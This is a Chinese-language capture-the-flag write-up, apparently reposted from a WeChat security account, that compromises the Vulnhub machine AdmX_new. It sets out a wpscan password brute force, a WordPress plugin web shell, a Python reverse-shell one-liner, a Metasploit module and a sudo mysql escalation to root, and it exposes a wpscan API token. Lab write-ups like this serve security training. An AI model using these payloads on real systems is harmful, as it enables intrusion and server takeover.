Vulnhub-AdmX-new

admin
admin
admin
139701
文章
114
评论
2024年8月12日21:45:05评论18 views字数 2397阅读7分59秒阅读模式

0x01 靶机介绍

Name: AdmX_new
靶机下载地址:
https://download.vulnhub.com/admx/AdmX_new.7z

0x02 侦察

端口探测
首先使用 nmap 进行端口扫描。
nmap -p- -sV -sC -A 192.168.0.105 -oA nmap_AdmX_new

Vulnhub-AdmX-new

扫描结果显示目标开放80端口
80端口
访问http://192.168.0.105为 Apache 默认界面

Vulnhub-AdmX-new

目录扫描

使用 gobuster 进行目录扫描,成功找到目录tools、wordpress
gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirb/big.txt -x php

Vulnhub-AdmX-new

访问http://192.168.0.105/wordpress/为 WordPress 博客样板,但数据加载未完全

Vulnhub-AdmX-new

0x03 上线[www-data]

WordPress弱口令
使用 BurpSuite 抓取数据包,发现响应数据包head和body中均出现IP192.168.159.145

Vulnhub-AdmX-new

由于该IP在当前网络环境下不可达,而为了能够正常访问可替换为当前IP,在 BurpSuite 中找到 Proxy》Options

Vulnhub-AdmX-new

在 Match and Replace 中添加 Response Header 和 Response Body

192.168.159.145 192.168.0.105

Vulnhub-AdmX-new

再次通过 BurpSuite 代理访问目标,界面显示正常

Vulnhub-AdmX-new

使用 wpscan 进行初步扫描,成功发现目标存在一些漏洞

wpscan --url http://192.168.0.105/wordpress  --api-token RjrNLjvRw21PbkmvY6h4EI1uqS5wB9lzCpPiLziH3A --detection-mode aggressive -e

Vulnhub-AdmX-new

同时发现 admin 为默认管理用户

Vulnhub-AdmX-new

使用 wpscan 对 admin 管理用户进行密码爆破,成功拿到密码为adam14

wpscan --url http://192.168.0.105/wordpress -U admin -P /usr/share/wordlists/rockyou.txt

 

Vulnhub-AdmX-new

通过弱口令admin/adam14成功登录后台

Vulnhub-AdmX-new

 插件上传
在`Media`中但是无法上传。尝试在`Pligins`中上传包含木马的插件,插件能内容需符合 WordPress 的标准,插件代码如下:
<?php/*Plugin Name: WordPress.org PluginPlugin URI:  https://developer.wordpress.org/plugins/the-basics/Description: Basic WordPress Plugin Header CommentVersion:     2.0Author:      WordPress.orgAuthor URI:  https://developer.wordpress.org/License:     GPL2License URI: https://www.gnu.org/licenses/gpl-2.0.htmlText Domain: wporg*/if(isset($_GET['cmd'])) {    system($_GET['cmd']);}?>

打包木马为 zip 压缩包

zip shell.zip shell.php

Vulnhub-AdmX-new

在插件中上传安装刚打包的 zip 包

Vulnhub-AdmX-new

插件安装成功

Vulnhub-AdmX-new

选择插件WordPress.org Plugin并点击 activate

Vulnhub-AdmX-new

访问

http://192.168.0.105/wordpress/wp-content/plugins/shell.php?cmd=id`可知木马成功自行

Vulnhub-AdmX-new

反弹shell
检查是否安装 nc 和 python3
which ncwhich python3

在本地监听5555端口

nc -nvlp 5555

利用 python3 连接可成功拿到反弹shell

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.0.107,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

当然也可以使用 MSF 的wp_admin_shell_upload模块

msfconsolemsf > use exploit/unix/webapp/wp_admin_shell_uploadmsf > set username adminmsf > set password adam14msf > set rhosts 192.168.0.105msf > set targeturi /wordpressmsf > run

Vulnhub-AdmX-new

shell -t

0x04 权限提升

信息收集
查看用户发现 wpadmin,推测其密码与后台密码相同
cat /etc/passwd | grep -v nologin

Vulnhub-AdmX-new

成功切换至 wpadmin 用户
su wpadmin## adam14
在当前家目录拿到第一个flag
cat local.txt

Vulnhub-AdmX-new

查看当前用户是否拥有 sudo 权限,其中 mysql 命令在执行 sudo 时无需密码

sudo -l

Vulnhub-AdmX-new

sudo提权
通过 sudo 登录数据库,密码仍然是adam14
sudo mysql -u root -D wordpress -p## adam14

Vulnhub-AdmX-new

在命令行中执行 bash 成功拿到 root 权限
system /bin/bash -i
在家目录下成功拿到第二个flag
cd ~cat proof.txt

Vulnhub-AdmX-new

在wp-config.php中还找到数据库用户 admin 的密码

0x05 知识星球

Vulnhub-AdmX-new

原文始发于微信公众号(狐狸说安全):Vulnhub-AdmX-new

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月12日21:45:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub-AdmX-newhttp://cn-sec.com/archives/2008493.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息